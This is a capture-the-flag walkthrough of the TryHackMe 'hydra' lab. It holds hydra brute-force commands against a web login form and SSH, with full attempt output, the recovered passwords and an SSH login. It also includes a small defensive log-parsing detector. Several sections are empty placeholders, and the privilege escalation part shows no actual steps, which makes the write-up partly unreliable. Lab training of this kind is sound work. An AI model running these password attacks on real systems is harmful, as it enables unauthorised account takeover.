TryHackMe - hydra (Linux)
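Walkthrough of the TryHackMe hydra Linux machine, covering practical exploitation steps and privilege escalation techniques.
Overview
| Item | Details |
|---|---|
| OS | Linux |
| Difficulty | Not recorded |
| Target | Not recorded |
| Main entry vector | web, ssh attack path to foothold |
| Privilege escalation path | Local misconfiguration or credential reuse to elevate privileges |
Reconnaissance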
1. PortScan
Rustscan
💡 Why it works
High-quality reconnaissance narrows a large attack surface into a few validated exploitation paths. Accurate service mapping prevents time loss and supports targeted follow-up testing.
Initial Foothold
Not implemented (not recorded in PDF)
Nmap
Not implemented (not recorded in PDF)
2. Local Shell
The key commands and main points extracted from the PDF notes are organized here. Add further detail later as needed.
Commands run (extracted)
hydra
hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
ssh molly@$ip
Extracted images
No images extracted (no valid embedded images in the PDF)
Extracted notes (first 120 lines)
hydra
July 19, 2023 1:11
#1
Break through the website login form
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:58:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.191.239:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "654321" - 17 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "michael" - 18 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "ashley" - 19 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "qwerty" - 20 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "111111" - 21 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "iloveu" - 22 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "000000" - 23 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "michelle" - 24 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "tigger" - 25 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "sunshine" - 26 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "chocolate" - 27 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "soccer" - 29 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "anthony" - 30 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "friends" - 31 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "butterfly" - 32 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "purple" - 33 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "angel" - 34 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jordan" - 35 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "secret" - 42 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "andrea" - 43 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "carlos" - 44 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "bubbles" - 47 of 14344399 [child 15] (0/0)
[80][http-post-form] host: 10.10.191.239 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 00:58:16
#2
ssh brute force
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:59:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.191.239:22/
[22][ssh] host: 10.10.191.239 login: molly password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 01:00:04
#3
Connect via ssh
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ ssh molly@$ip
The authenticity of host '10.10.191.239 (10.10.191.239)' can't be established.
ED25519 key fingerprint is SHA256:o25OvvDnTHQn6/0YC3jvtmTZGtm2mJC5oLo+FE+2LFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.191.239' (ED25519) to the list of known hosts.
molly@10.10.191.239's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
32 updates are security updates.
Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-191-239:~$
molly@ip-10-10-191-239:~$
molly@ip-10-10-191-239:~$ ls -la
Not implemented (not recorded in PDF)
💡 Why it works
Initial access succeeds when enumeration findings are turned into a practical exploit chain. Capturing credentials, file disclosure, or direct RCE creates reliable pivot points for privilege escalation.
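A defender's view of the SSH password-guessing run above, as an added example that is not part of the original notes: it scans sshd auth-log lines for a burst of failed password attempts from one source followed by an accepted login. The log lines, the 192.0.2.10 and 198.51.100.7 addresses, the `find_bruteforce` name, and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth.log sample (addresses and times are illustrative).
SAMPLE_LOG = """\
Jul 19 00:59:51 host sshd[2101]: Failed password for molly from 192.0.2.10 port 40112 ssh2
Jul 19 00:59:51 host sshd[2102]: Failed password for molly from 192.0.2.10 port 40114 ssh2
Jul 19 00:59:52 host sshd[2103]: Failed password for molly from 192.0.2.10 port 40116 ssh2
Jul 19 00:59:52 host sshd[2104]: Failed password for molly from 192.0.2.10 port 40118 ssh2
Jul 19 00:59:53 host sshd[2105]: Failed password for molly from 192.0.2.10 port 40120 ssh2
Jul 19 00:59:54 host sshd[2106]: Failed password for molly from 192.0.2.10 port 40122 ssh2
Jul 19 01:00:03 host sshd[2107]: Accepted password for molly from 192.0.2.10 port 40124 ssh2
Jul 19 01:05:10 host sshd[2150]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jul 19 01:05:20 host sshd[2151]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2023):
    """Alert on failure bursts per (source, user) and on a success that follows one."""
    recent = defaultdict(deque)  # (src, user) -> timestamps of recent failures
    flagged, alerts = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["src"], m["user"])
        q = recent[key]
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", *key, len(q)))
        elif len(q) >= threshold:  # accepted login while the burst is in window
            alerts.append(("success_after_bruteforce", *key, len(q)))
    return alerts

if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```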
Privilege Escalation
3.Privilege Escalation
Privilege elevation related commands extracted from PDF memo.
💡 Why it works
Privilege escalation depends on chaining local weaknesses such as sudo misconfiguration, weak file permissions, or credential reuse. If a GTFOBins technique is used, the mechanism is that an allowed binary executes a child process or shell without dropping elevated effective privileges.
Credentials
┌──(n0z0㉿galatea)-[~/work/thm/hydra]
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:58:07
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.191.239:80/login:username=^USER^&password=^PASS^:F=incorrect
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.191.239 - login "molly" - pass "password1" - 28 of 14344399 [child 10] (0/0)
[80][http-post-form] host: 10.10.191.239 login: molly password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 00:58:16
└─$ hydra -l molly -P /usr/share/wordlists/rockyou.txt $ip ssh
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-19 00:59:50
[22][ssh] host: 10.10.191.239 login: molly password: butterfly
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-19 01:00:04
ED25519 key fingerprint is SHA256:o25OvvDnTHQn6/0YC3jvtmTZGtm2mJC5oLo+FE+2LFw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
molly@10.10.191.239's password:
Summary and Lessons Learned
4.Overview
flowchart LR
subgraph SCAN["🔍 Scan"]
direction TB
S1["Port and web enumeration"]
end
subgraph INITIAL["💥 Initial Foothold"]
direction TB
I1["Initial foothold from extracted workflow"]
end
subgraph PRIVESC["⬆️ Privilege Escalation"]
direction TB
P1["Privilege escalation from extracted notes"]
end
SCAN --> INITIAL --> PRIVESC
References
- nmap
- rustscan
- hydra
- ssh
- GTFOBins